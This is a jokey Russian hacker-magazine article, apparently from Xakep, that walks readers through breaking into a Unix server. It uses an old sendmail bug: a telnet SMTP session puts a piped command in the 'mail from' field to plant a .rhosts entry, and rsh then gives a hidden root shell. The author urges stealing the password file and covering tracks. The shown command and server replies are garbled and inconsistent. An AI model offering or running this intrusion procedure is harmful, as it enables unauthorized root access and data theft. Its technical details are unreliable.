Здравствуйте, дорогие мальчики
и девочки. Что? Уже не девочки? Понятно, извиняюсь…
Сейчас я раскажу вам сказочку… Хотя о чем это я?
Ну да ладно…

Многие уважающие себя люди,
хоть как-то знакомые с интернетом, знают, что
большая часть web-серваков построена на базе
всяких там юниксов и линуксов. И построена не зря.
Эти ОСи, в отличии от виндов глючат не при первом
попавшемся случае и сломать их достаточно сложно
из-за малого количества дырок. Именно из-за
малого; но дырки все-таки присутствуют, т.к.
безглючных операционок существовать не может (даже
у людей дырки есть. Целых семь! На досуге
пересчитай, все-ли целы — ничё там не заросло :))? Ну
вот одну из таких дыр (да не в тебе, а в web-серваках
на юнихе) мы сейчас и рассмотрим…

Вскрытие

Ты когда нибудь е-мылом
пользовался? Ну так вот, твой вампирыч, когда
отсылает почту, первым делом подсединяется к
серваку и передает твою интимную переписку с
хакершей Соней из города Мухосранска  такой
проге под названием sendmail. Эта программа
задумывалась как служебная утилита и вошла во
многие дистрибутивы юникс-систем. Но в одной из
версий этой проги есть досадный баг, при
активизации которого сендмейл вываливается в
шелл с правами root’а. Ну вот в принципе-то и всё.
Теоретическая часть закончена, приступаем к
водным процедурам :). Инструментом для взлома нам
будет служить программа, входящая в стандартный
пакет поставки виндов, называется telnet. Вот её и
возьмем. Подключившись к взламываемой машине,
проделываем нижеописанные незамысловатые
действия: (после точки с запятой идут комментарии)

Ампутация

telnet lamer.com 25 — телнетимся на
25 smtp порт
Connecting to 123.123.123.123.
220 sendmail SMI/4.3.5.2 ready
helo xxx  — здрасьте, здрасьте, коли не шутите…
220 Helo xxx, ( hacker.com )
mail from: |echo hacker.com/.rhosts@lamer.com
— подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: vasya_pupkin_v_gostyah_u_prababushki@lamer.com
— вводим заранее неправильного адресата
500 vasya_pupkin_v_gostyah_u_prababushki@lamer.com: user unknown — не
обращая внимания на визги, продолжаем…
data
230 Enter mail, end with .
200 Mail accepted — трандец…. Готово, сломали!
quit

А теперь заходим так, чтобы нас
не было видно через who

# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#

Всё, сендмейл в шелле, можешь спокойно и неторопливо трахать машину. Для примера можно утянуть файл с паролями, а можно
придумать что-то более (экзо\эро)тичное. Всё
ограничивается только твоей извращенской
фантазией. Но в случае, если ты ломаешь что-то
сверхзащищенное, то не забудь замести следы, а то
прийдут добрые дяди из ФСБ и… (Тут запись
обрывается. В результате экспертизы Х на стоящем
на полу магнитофоне будут обнаружены шаги, слова:
«откройте, милиция», крики о помощи и
выстрелы. На полу обнаружена кровь, а автор
вообще не обнаружен).

Оставить мнение

Check Also

Кампания Zealot направлена на серверы под управлением Windows и Linux, чтобы майнить Monero

Аналитики F5 Networks обнаружили сложную вредоносную кампанию по взлому серверов, работающ…